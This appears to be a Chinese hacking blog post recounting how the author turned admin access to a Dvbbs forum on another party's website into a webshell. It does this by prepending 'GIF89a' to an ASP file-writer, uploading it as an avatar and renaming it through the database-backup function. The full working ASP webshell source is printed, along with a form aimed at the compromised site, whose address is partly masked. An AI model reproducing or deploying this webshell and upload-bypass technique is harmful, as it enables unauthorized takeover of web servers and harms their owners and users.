動網後台也可以這樣玩

 

作者：9xiao 來源：http://www.wrsky.com

偶以前遇到過這樣的論壇，只完成了前面的操作可是後面就是一個x不知道怎麼辦啦，還是九小這小子聰明，哈哈）
今天下午powers群有個夥計給了偶個動網論壇的後台許可權，問偶能否拿個webshell，進後台後，就準備備份資料庫拿webshell，發現論壇版塊
的上傳許可權沒有開啟，開了之後，用管理員id發貼上傳，*，上傳檔案被刪，接著從頭像上傳入手，發現asp尾碼改為gif一樣提示類型不對
，於是放棄上傳的思路，想想論壇還有什麼資料庫，忽然想到data檔案夾有個ip資料庫，看來有些希望了，在ip地址管理把最小馬插入，備份
為.asp後，竟然提示，Microsoft VBScript 編譯器錯誤 錯誤 ’800a0408’ 無效字元  
bbs/9xiao.asp，行 3706  
鐰^txQ
失敗了，鬱悶了好半天，想到4月1號的時候測試fox.wrsky.com動網7.1的後台備份時候比7.0多了個驗證備份檔案是否mdb資料庫的提示，當時
首先就想到了把最小馬插到一個資料庫後，改gif尾碼上傳後再後台備份asp尾碼，結果實驗成功。7.0的在備份的時候沒有檢測要備份的檔案類
型，偶想到了站上其他目錄，把幾個關鍵的.asp檔案備份成gif尾碼，在ie瀏覽中拿到了這個站上的dns的資料庫，下來看是admin是md5加密，
偶一向是不主張暴力破解，覺得還是回到上傳頭像這，接了幾個業務電話，思路逐漸清晰了些，想起了昨天和firefox在示範某個站的上傳，後
綴不改只是在第一行加了GIF89a 這是gif的特徵碼，呵呵有門了一定可以突破頭像上傳那端驗證；呵呵＊起那個有名的寫asp的webshell，在第
一行加上GIF89a，改尾碼.gif，用管理員id上傳了頭像，在論壇根目錄備份了9xiao.asp，瀏覽器瀏覽下，鬱悶撒怎麼顯示了紅X，用網際快車
把它下來來，用記事本開啟<form action=’’ method=post>儲存檔案的<font  
color=red>絕對路徑(包括檔案名稱:如D:/web/x.asp):</font><input type=text name=syfdpath width=32  
size=50><br>本檔案絕對路徑d:/*******/web*****/www/bbs/9xiao.asp<br>輸入馬的內容:<textarea name=cyfddata cols=80 rows=10  
width=32></textarea><input type=submit  
value=儲存></form>改成.html好熟悉的介面撒，儲存檔案的絕對路徑(包括檔案名稱:如D:/web/x.asp):  
本檔案絕對路徑d:/*******/web*****/www/bbs/9xiao.asp
代碼應該是執行了，在<form action=’’ method=post>中’’中輸入9xiao.asp的url，儲存檔案的絕對路徑(包括檔案名稱:如D:/web/x.asp):框輸
入d:/*******/web*****/www/bbs/9xiao2.asp 馬的內容輸入“Firefox，你好！”點下提交，瀏覽下呵呵。
GIF89a  
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action=’’ method=post>" %>
<% Response.write "儲存檔案的<font color=red>絕對路徑(包括檔案名稱:如D:/web/x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本檔案絕對路徑" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=儲存>" %>
<% Response.write "</form>" %>

<form action=’_blank>http://www.****.net/bbs/9xiao.asp’ method=post>儲存檔案的<font
color=red>絕對路徑(包括檔案名稱:如D:/web/x.asp):</font><input type=text name=syfdpath width=32
size=50><br>本檔案絕對路徑d:/virtualhost/web79354/www/bbs/9xiao.asp<br>輸入馬的內容:<textarea name=cyfddata cols=80 rows=10
width=32></textarea><input type=submit value=儲存></form>